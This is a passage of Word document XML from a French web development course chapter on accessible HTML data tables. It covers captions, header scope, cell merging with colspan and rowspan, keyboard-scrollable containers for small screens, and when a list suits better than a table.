              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corps du tableau</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Facultatif mais clair</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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tfoot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Pied, totaux</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Facultatif</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ligne</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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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th</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Cellule d'en-tête</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Oui pour les en-têtes</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>td</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cellule de données</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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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scope="col"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"row"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Portée de l'en-tête</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Oui pour les en-têtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 Construire un tableau lisible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un tableau de données doit rester compréhensible sans CSS. C'est le test décisif : sans styles, l'ordre de lecture doit être logique, les en-têtes identifiables et les unités présentes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un tableau complet, avec en-têtes de lignes et totaux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&lt;table&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;caption&gt;Consommation électrique mensuelle (kWh)&lt;/caption&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Mois&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;2025&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;2026&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Écart&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;tbody&gt;</w:t>
        <w:br/>
        <w:t>&lt;tr&gt;&lt;th scope="row"&gt;Janvier&lt;/th&gt;&lt;td&gt;412&lt;/td&gt;&lt;td&gt;398&lt;/td&gt;&lt;td&gt;−3,4 %&lt;/td&gt;&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t>&lt;tr&gt;&lt;th scope="row"&gt;Février&lt;/th&gt;&lt;td&gt;389&lt;/td&gt;&lt;td&gt;370&lt;/td&gt;&lt;td&gt;−4,9 %&lt;/td&gt;&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/tbody&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;tfoot&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;&lt;th scope="row"&gt;Total&lt;/th&gt;&lt;td&gt;801&lt;/td&gt;&lt;td&gt;768&lt;/td&gt;&lt;td&gt;−4,1 %&lt;/td&gt;&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/tfoot&gt;</w:t>
        <w:br/>
        <w:t>&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le signe moins typographique </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>−</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (U+2212) se distingue du trait d'union ; il s'aligne mieux avec les chiffres. Les nombres restent alignés à droite en CSS, les textes à gauche : l'œil compare alors les ordres de grandeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un tableau lisible, sans artifice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table {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-collapse: collapse;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: 100%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-variant-numeric: tabular-nums;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>caption { text-align: left; font-weight: 700; padding-bottom: .5rem; }</w:t>
        <w:br/>
        <w:t>th, td { padding: .5rem .75rem; border-bottom: 1px solid #d5dee6; }</w:t>
        <w:br/>
        <w:t>th { text-align: left; background: #e8edf1; }</w:t>
        <w:br/>
        <w:t>td { text-align: right; }</w:t>
        <w:br/>
        <w:t>td:first-child, th[scope="row"] { text-align: left; }</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NE JAMAIS UTILISER DE TABLEAU POUR LA MISE EN PAGE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Si vous vous surprenez à écrire </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;table&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour aligner deux blocs, arrêtez-vous : utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>display: grid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>flex</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>. Le tableau restera annoncé comme tel par les technologies d'assistance, et la page deviendra incompréhensible sans CSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.3 Fusion de cellules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>colspan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fusionne des cellules horizontalement, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rowspan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> verticalement. Ces attributs compliquent la lecture assistée : à utiliser avec parcimonie et toujours avec des en-têtes explicites.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une fusion horizontale lisible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&lt;table&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;caption&gt;Horaires des ateliers&lt;/caption&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Jour&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Matin&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Après-midi&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;tbody&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="row"&gt;Lundi&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td colspan="2"&gt;Journée d'intégration&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="row"&gt;Mardi&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td&gt;HTML&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td&gt;CSS&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/tbody&gt;</w:t>
        <w:br/>
        <w:t>&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une fusion verticale (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rowspan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) qui traverse plusieurs lignes est souvent le signe qu'un tableau plus simple serait possible. Si elle est indispensable, ajoutez des identifiants et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur les cellules concernées :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un en-tête fusionné, relié explicitement aux cellules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&lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;th id="t1" scope="rowgroup" rowspan="2"&gt;Trimestre 1&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;td headers="t1"&gt;Janvier&lt;/td&gt;</w:t>
        <w:br/>
        <w:t>&lt;/tr&gt;</w:t>
        <w:br/>
        <w:t>&lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;td headers="t1"&gt;Février&lt;/td&gt;</w:t>
        <w:br/>
        <w:t>&lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.4 Tableaux et petits écrans</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un tableau de six colonnes ne tient pas sur un téléphone. Trois stratégies existent, à choisir selon la nature des données.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.24 — Trois façons d'adapter un tableau au mobile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40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Stratégie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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Principe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Quand l'utiliser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Défilement horizontal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le tableau garde sa structure, on fait défiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Peu de lignes, beaucoup de colonnes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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Empilement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="345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Chaque ligne devient une fiche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Données hétérogènes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Priorisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3455"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Certaines colonnes sont masquées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Colonnes secondaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un conteneur défilant accessible au clavier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&lt;div class="tableau-defilant" tabindex="0" role="region"</w:t>
        <w:br/>
        <w:t xml:space="preserve">     aria-label="Consommation électrique mensuelle, tableau défilant"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;table&gt;...&lt;/table&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Défilement horizontal, focus visible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.tableau-defilant { overflow-x: auto; }</w:t>
        <w:br/>
        <w:t>.tableau-defilant:focus-visible { outline: 3px solid #e0a21b; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (max-width: 40rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .tableau-defilant table { min-width: 34rem; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tabindex="0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rend la zone défilante accessible au clavier : sans lui, un utilisateur qui ne peut pas utiliser la souris ne peut pas voir les colonnes cachées. C'est un détail que la plupart des sites oublient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.5 Tableau, liste ou composant ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Avant d'écrire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;table&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, posez la question : les données ont-elles deux dimensions ? Si la réponse est non, un autre élément convient.</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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>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Bonne solution</w:t>
            </w:r>
          </w:p>
        </w:tc>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Mauvaise solution</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Comparer des offres sur trois critères</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Tableau</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Cartes empilées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Afficher une liste de courses</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ul</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Tableau à une colonne</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Présenter une fiche produit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>article</w:t>
